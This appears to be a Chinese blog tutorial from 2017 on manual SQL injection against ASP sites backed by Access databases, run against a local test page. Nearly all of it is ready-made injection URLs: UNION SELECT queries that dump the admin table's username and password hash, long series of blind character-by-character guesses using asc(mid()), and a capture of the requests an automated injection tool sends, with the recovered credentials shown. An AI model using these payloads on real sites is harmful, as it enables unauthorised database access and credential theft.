WEB安全 asp+access注入

asp+access注入


数据库 (access数据库没有数据库名)
表名	
	字段(列名)
	记录(行,内容)


注入常用函数:
top n 表示查询结果的第n个记录
len() 函数返回文本字段中值的长度
mid(column_name,start[,length])函数用于从文本字段中提取指定长度的字符
asc() 返回指定文本字符的ASCII码
ORDER BY 语句用于根据指定的列对结果集进行排序。默认按照升序对记录进行排序,降序使用 DESC 关键字。order by admin DESC

一、asp+access 手工注入联合查询法
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 22
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 23
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
admin  a48e190fafc257d3   //and 1=2 UNION ALL SELECT 1,2,3,..... form admin 这种方法也用于先报错再获取可显示位
http

二、asp+access 手工逐字猜解法 
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(admin) from admin)=5 //admin
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 (a)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,2,1)) from admin)=100 (d)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,3,1)) from admin)=109 (m)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,4,1)) from admin)=105 (i)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,5,1)) from admin)=110 (n)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16  //a48e190fafc257d3
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97 (a)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,2,1)) from admin)=52 (4)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,3,1)) from admin)=56 (8)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,4,1)) from admin)=101 (e)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,5,1)) from admin)=49 (1)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,6,1)) from admin)=57 (9)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,7,1)) from admin)=48 (0)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,8,1)) from admin)=102 (f)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,9,1)) from admin)=97 (a)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,10,1)) from admin)=102 (f)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,11,1)) from admin)=99 (c)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,12,1)) from admin)=50 (2)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,13,1)) from admin)=53 (5)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,14,1)) from admin)=55 (7)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,15,1)) from admin)=100 (d)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,16,1)) from admin)=51 (3)


三、明小子注入工具抓包分析 asp+access逐字猜解法 抓包工具:SRSniffer,WSockExpert
1.检测是否是注入点:
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from sysobjects)
2.猜是否存在指定表名:
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from user)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from menbers)
3.猜指定表是否存在指定列名(也叫字段):
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select username from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select admin from admin)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)
3.猜admin表第一个字段有几行记录(2行记录表示两个用户):
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)<=2
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=1
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=2
4.猜第一行记录长度://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=2
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=4
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=6
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)=5
5.猜解第一个用户admin字段一位字符,对比ASCII值:
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select top 1 admin from admin where instr(admin,'admin')=1 and len(username)=5)
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 97 and 97
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 100 and 100
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 109 and 109
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 105 and 105
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 110 and 110
6.猜解password字段长度、每一位字符:
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([password])) From (Select Top 1 * From [admin] Where 1=1 Order by [password]) T Order by [password] desc)=16

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 52 and 52
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 56 and 56
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),4,1)) from (Select Top 2 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 101 and 101
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 49 and 49
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),6,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 57 and 57
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),7,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 48 and 48
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),8,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),9,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),10,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),11,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 99 and 99
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),12,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 50 and 50
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),13,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 53 and 53
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),14,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 55 and 55
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),15,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 100 and 100
http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),16,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 51 and 51

  

附:

 

 

posted @ 2017-11-26 21:34  ihoneysec  阅读(1600)  评论(0编辑  收藏  举报